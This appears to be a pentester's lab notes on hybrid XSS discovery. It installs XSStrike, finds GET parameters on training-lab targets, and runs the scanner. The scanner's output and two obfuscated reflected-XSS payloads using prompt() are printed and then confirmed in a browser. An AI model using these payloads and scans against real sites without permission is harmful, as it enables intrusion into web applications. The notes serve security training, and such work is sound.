XSS TESTING (HYBRID)
INSTALL AUTOMATED XSS DISCOVERY TOOL
root@oco:~$ git clone https://github.com/s0md3v/XSStrike.git
root@oco:~$ cd XSStrike
root@oco:~$ pip install -r requirements.txt
root@oco:~$ chmod 777 xsstrike.pyPERFORM HYBRID DISCOVERY (MAIN PAGE)
#perform code review
root@oco:~$ BROWSER > {targetSite:port} > CTRL + U
* review the HTML source and identify parameters
* also review the .js file
#verify by entering data in the form fields
root@oco:~$ BROWSER > {targetSite:port} > F12
input fields: fill in data
* copy the full URL to identify GET request parameters
- http://94.237.60.32:30702/index.php?fullname=bughunter&username=debugger&password=password&email=email%40null.com
- fullname, username, password, email
#perform automated discovery
root@oco:~$ ./xsstrike.py -u "http://94.237.60.32:30702/index.php?fullname=bughunter&username=bugger&password=password&email=email%40null.com"
XSStrike v3.1.5
[~] Checking for DOM vulnerabilities
[+] WAF Status: Offline
[!] Testing parameter: fullname
[-] No reflection found
[!] Testing parameter: username
[-] No reflection found
[!] Testing parameter: password
[-] No reflection found
[!] Testing parameter: email
[!] Reflections found: 1
[~] Analysing reflections
[~] Generating payloads
[!] Payloads generated: 3072
------------------------------------------------------------
[+] Payload: <hTML%0donpoiNtEreNtER+=+(prompt)``//
[!] Efficiency: 100
[!] Confidence: 10
[?] Would you like to continue scanning? [y/N]
#manually verify the identified parameter
root@oco:~$ BROWSER > http://94.237.60.32:30702/index.php?fullname=bughunter&username=bugger&password=password&email=<hTML%0donpoiNtEreNtER+=+(prompt)``//
* a prompt will be displayedPERFORM HYBRID DISCOVERY (SUBDIRECTORY)
#perform code review
root@oco:~$ BROWSER > {targetSite:port}/{subdirectory} > CTRL + U
* review the HTML source and identify parameters
* also review the .js file
#verify by entering data in the form fields
root@oco:~$ BROWSER > {targetSite:port}/{subdirectory} > F12
input fields: fill in data
* copy the full URL to identify GET request parameters
- http://10.129.171.142/phishing/index.php?url=ytrst
#perform automated discovery
root@oco:~$ ./xsstrike.py -u "http://ACADEMY-XSS-ASMT/phishing/index.php?url=ytrst"
XSStrike v3.1.5
[~] Checking for DOM vulnerabilities
[+] WAF Status: Offline
[!] Testing parameter: url
[!] Reflections found: 1
[~] Analysing reflections
[~] Generating payloads
[!] Payloads generated: 3096
------------------------------------------------------------
[+] Payload: '><D3v%0aONpOINteReNtER%09=%09(prompt)``%0dx>v3dm0s
[!] Efficiency: 100
[!] Confidence: 9
[?] Would you like to continue scanning? [y/N] N
#manually verify the identified parameter
root@oco:~$ BROWSER > http://10.129.171.142/phishing/index.php?url='><D3v%0aONpOINteReNtER%09=%09(prompt)``%0dx>v3dm0s
* text string will be applied to the pageLast updated